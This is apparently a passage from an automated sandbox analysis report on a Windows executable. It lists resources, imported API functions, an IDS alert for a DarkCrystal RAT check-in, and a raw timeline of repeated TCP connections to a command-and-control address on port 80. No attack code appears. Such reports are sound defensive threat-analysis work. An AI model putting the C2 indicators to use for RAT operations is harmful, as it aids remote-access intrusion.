| RT_DIALOG | 0x70588 | 0x286 | data | English | United States | 0.5092879256965944 |
| RT_DIALOG | 0x70358 | 0x13a | data | English | United States | 0.60828025477707 |
| RT_DIALOG | 0x70498 | 0xec | data | English | United States | 0.6991525423728814 |
| RT_DIALOG | 0x70228 | 0x12e | data | English | United States | 0.5927152317880795 |
| RT_DIALOG | 0x6fef0 | 0x338 | data | English | United States | 0.45145631067961167 |
| RT_DIALOG | 0x6fc98 | 0x252 | data | English | United States | 0.5757575757575758 |
| RT_STRING | 0x70f68 | 0x1e2 | data | English | United States | 0.3900414937759336 |
| RT_STRING | 0x71150 | 0x1cc | data | English | United States | 0.4282608695652174 |
| RT_STRING | 0x71320 | 0x1b8 | data | English | United States | 0.45681818181818185 |
| RT_STRING | 0x714d8 | 0x146 | data | English | United States | 0.5153374233128835 |
| RT_STRING | 0x71620 | 0x46c | data | English | United States | 0.3454063604240283 |
| RT_STRING | 0x71a90 | 0x166 | data | English | United States | 0.49162011173184356 |
| RT_STRING | 0x71bf8 | 0x152 | data | English | United States | 0.5059171597633136 |
| RT_STRING | 0x71d50 | 0x10a | data | English | United States | 0.49624060150375937 |
| RT_STRING | 0x71e60 | 0xbc | data | English | United States | 0.6329787234042553 |
| RT_STRING | 0x71f20 | 0xd6 | data | English | United States | 0.5747663551401869 |
| RT_GROUP_ICON | 0x6fc30 | 0x68 | data | English | United States | 0.7019230769230769 |
| RT_MANIFEST | 0x70810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333 |

| DLL | Import |
|---|---|
| KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage |
| OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear |
| gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree |

| Language of compilation system | Country where language is spoken |
|---|---|
| English | United States |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-08T11:52:08.853157+0200 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49738 | 80.211.144.156 | 80 | TCP |
                                                          Sep 8, 2024 11:52:17.976203918 CEST804975180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:18.025036097 CEST4975180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:18.176503897 CEST804975180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:18.228269100 CEST4975180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:18.311184883 CEST4975180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:18.311907053 CEST4975280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:18.316833973 CEST804975180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:18.316852093 CEST804975280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:18.316920996 CEST4975180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:18.316953897 CEST4975280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:18.317027092 CEST4975280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:18.321830988 CEST804975280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:18.665863991 CEST4975280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:18.800426006 CEST804975280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:18.800462008 CEST804975280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:18.800472021 CEST804975280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:18.987389088 CEST804975280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:19.040656090 CEST4975280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:19.116755962 CEST804975280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:19.165668964 CEST4975280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:19.240837097 CEST4975280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:19.241498947 CEST4975380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:19.246150017 CEST804975280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:19.246223927 CEST4975280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:19.246459961 CEST804975380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:19.246519089 CEST4975380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:19.246618986 CEST4975380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:19.251537085 CEST804975380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:19.603374958 CEST4975380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:19.650043011 CEST4975380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:19.776573896 CEST804975380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:19.776592970 CEST804975380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:19.776603937 CEST804975380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:19.776613951 CEST804975380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:19.923357964 CEST804975380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:19.978199959 CEST4975380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.138448000 CEST804975380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:20.181412935 CEST4975380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.213201046 CEST4975380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.213912010 CEST4975480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.218494892 CEST804975380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:20.218612909 CEST4975380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.218708992 CEST804975480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:20.218775034 CEST4975480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.218888998 CEST4975480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.223647118 CEST804975480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:20.266912937 CEST4975480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.310102940 CEST4975580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.315386057 CEST804975580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:20.315512896 CEST4975580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.315707922 CEST4975580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.317866087 CEST804975480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:20.320522070 CEST804975580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:20.665802002 CEST4975580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.670788050 CEST804975580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:20.670814991 CEST804975580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:20.670825005 CEST804975580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:20.688082933 CEST804975480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:20.688143015 CEST4975480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:20.980123997 CEST804975580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:21.025155067 CEST4975580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:21.109177113 CEST804975580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:21.150100946 CEST4975580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:21.226319075 CEST4975580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:21.227113962 CEST4975680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:21.231431007 CEST804975580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:21.231506109 CEST4975580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:21.231998920 CEST804975680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:21.232067108 CEST4975680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:21.232206106 CEST4975680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:21.236969948 CEST804975680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:21.587627888 CEST4975680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:21.592609882 CEST804975680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:21.592629910 CEST804975680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:21.592639923 CEST804975680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:21.904670000 CEST804975680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:21.947009087 CEST4975680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:22.105689049 CEST804975680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:22.150029898 CEST4975680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:22.226073980 CEST4975780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:22.230997086 CEST804975780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:22.231070995 CEST4975780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:22.231185913 CEST4975780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:22.236013889 CEST804975780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:22.587646961 CEST4975780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:22.592721939 CEST804975780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:22.592736006 CEST804975780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:22.592747927 CEST804975780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:22.897002935 CEST804975780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:22.946933985 CEST4975780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:23.108097076 CEST804975780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:23.150027037 CEST4975780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:23.224843979 CEST4975780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:23.225406885 CEST4975880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:23.230175972 CEST804975780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:23.230191946 CEST804975880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:23.230228901 CEST4975780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:23.230269909 CEST4975880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:23.230359077 CEST4975880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:23.235079050 CEST804975880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:23.587661982 CEST4975880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:23.592812061 CEST804975880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:23.592825890 CEST804975880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:23.592835903 CEST804975880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:23.915910959 CEST804975880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:23.962630033 CEST4975880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:24.052599907 CEST804975880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:24.103202105 CEST4975880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:24.179056883 CEST4975880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:24.179663897 CEST4975980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:24.184271097 CEST804975880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:24.184326887 CEST4975880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:24.184510946 CEST804975980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:24.184587955 CEST4975980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:24.184771061 CEST4975980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:24.189569950 CEST804975980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:24.540755987 CEST4975980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:24.545934916 CEST804975980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:24.545948029 CEST804975980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:24.545958996 CEST804975980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:24.855643988 CEST804975980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:24.900043964 CEST4975980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:24.986383915 CEST804975980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.040709972 CEST4975980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.100416899 CEST4975980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.101150990 CEST4976080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.105731010 CEST804975980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.105812073 CEST4975980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.105942965 CEST804976080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.106002092 CEST4976080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.106090069 CEST4976080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.110794067 CEST804976080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.322561026 CEST4976080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.323263884 CEST4976180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.328253984 CEST804976180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.328329086 CEST4976180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.328500032 CEST4976180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.333376884 CEST804976180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.373938084 CEST804976080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.445175886 CEST4976280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.450073957 CEST804976280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.450136900 CEST4976280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.450258017 CEST4976280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.455020905 CEST804976280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.572609901 CEST804976080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.572665930 CEST4976080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.681519032 CEST4976180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.686557055 CEST804976180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.686651945 CEST804976180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.806585073 CEST4976280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:25.811621904 CEST804976280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.811638117 CEST804976280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:25.811647892 CEST804976280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:26.001065016 CEST804976180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:26.040652037 CEST4976180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:26.132617950 CEST804976280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:26.181301117 CEST4976280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:26.210725069 CEST804976180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:26.262236118 CEST4976180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:26.264496088 CEST804976280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:26.306312084 CEST4976280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:26.381984949 CEST4976180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:26.381984949 CEST4976280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:26.382738113 CEST4976380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:26.387010098 CEST804976180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:26.387064934 CEST4976180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:26.387301922 CEST804976280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:26.387346029 CEST4976280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:26.387528896 CEST804976380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:26.387588024 CEST4976380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:26.387701035 CEST4976380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:26.393450022 CEST804976380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:26.743978024 CEST4976380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:26.751665115 CEST804976380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:26.751683950 CEST804976380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:26.751692057 CEST804976380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:27.048445940 CEST804976380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:27.103290081 CEST4976380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:27.251797915 CEST804976380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:27.306504011 CEST4976380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:27.366168976 CEST6471380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:27.371047020 CEST806471380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:27.371118069 CEST6471380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:27.371238947 CEST6471380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:27.375997066 CEST806471380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:27.728380919 CEST6471380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:27.733560085 CEST806471380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:27.733576059 CEST806471380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:27.733584881 CEST806471380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:28.037736893 CEST806471380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:28.087538004 CEST6471380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:28.165520906 CEST806471380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:28.212544918 CEST6471380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:28.288441896 CEST6471380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:28.289401054 CEST6471480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:28.415688992 CEST806471380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:28.415776968 CEST6471380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:28.415843010 CEST806471480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:28.416147947 CEST806471380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:28.416232109 CEST6471380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:28.416232109 CEST6471480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:28.416476011 CEST6471480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:28.421253920 CEST806471480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:28.775190115 CEST6471480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:28.780251026 CEST806471480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:28.780270100 CEST806471480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:28.780280113 CEST806471480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:29.099853039 CEST806471480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:29.150114059 CEST6471480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:29.232681990 CEST806471480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:29.275079966 CEST6471480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:29.350492954 CEST6471480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:29.351188898 CEST6471580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:29.355870962 CEST806471480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:29.355968952 CEST6471480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:29.356021881 CEST806471580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:29.356091976 CEST6471580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:29.356218100 CEST6471580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:29.360958099 CEST806471580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:29.712657928 CEST6471580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:29.717677116 CEST806471580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:29.717694998 CEST806471580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:44.634433985 CEST6473480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:44.717046022 CEST806473480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:44.759476900 CEST6473480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:44.835551977 CEST6473580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:44.840606928 CEST806473580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:44.840747118 CEST6473580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:44.840869904 CEST6473580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:44.845688105 CEST806473580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:45.197648048 CEST6473580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:45.202706099 CEST806473580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:45.202722073 CEST806473580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:45.202733994 CEST806473580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:45.506228924 CEST806473580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:45.556344032 CEST6473580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:45.636684895 CEST806473580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:45.681353092 CEST6473580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:45.758976936 CEST6473580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:45.763003111 CEST6473680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:45.764128923 CEST806473580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:45.764182091 CEST6473580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:45.767858982 CEST806473680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:45.767955065 CEST6473680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:45.769434929 CEST6473680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:45.774306059 CEST806473680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:46.118974924 CEST6473680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:46.124011993 CEST806473680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:46.124032021 CEST806473680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:46.124046087 CEST806473680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:46.430526972 CEST806473680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:46.478208065 CEST6473680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:46.560022116 CEST806473680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:46.603250027 CEST6473680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:46.679403067 CEST6473680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:46.680135965 CEST6473780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:46.684748888 CEST806473680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:46.684801102 CEST6473680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:46.684977055 CEST806473780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:46.685036898 CEST6473780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:46.685189009 CEST6473780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:46.689928055 CEST806473780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:47.040894032 CEST6473780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:47.045972109 CEST806473780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:47.045994997 CEST806473780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:47.046006918 CEST806473780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:47.355787992 CEST806473780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:47.400077105 CEST6473780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:47.486373901 CEST806473780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:47.540685892 CEST6473780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:47.600472927 CEST6473780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:47.601150990 CEST6473880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:47.605700016 CEST806473780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:47.605767012 CEST6473780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:47.605937958 CEST806473880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:47.606000900 CEST6473880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:47.606170893 CEST6473880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:47.610924959 CEST806473880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:47.962707996 CEST6473880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:47.967858076 CEST806473880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:47.967876911 CEST806473880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:47.967890024 CEST806473880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:48.303637981 CEST806473880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:48.353252888 CEST6473880192.168.2.480.211.144.156
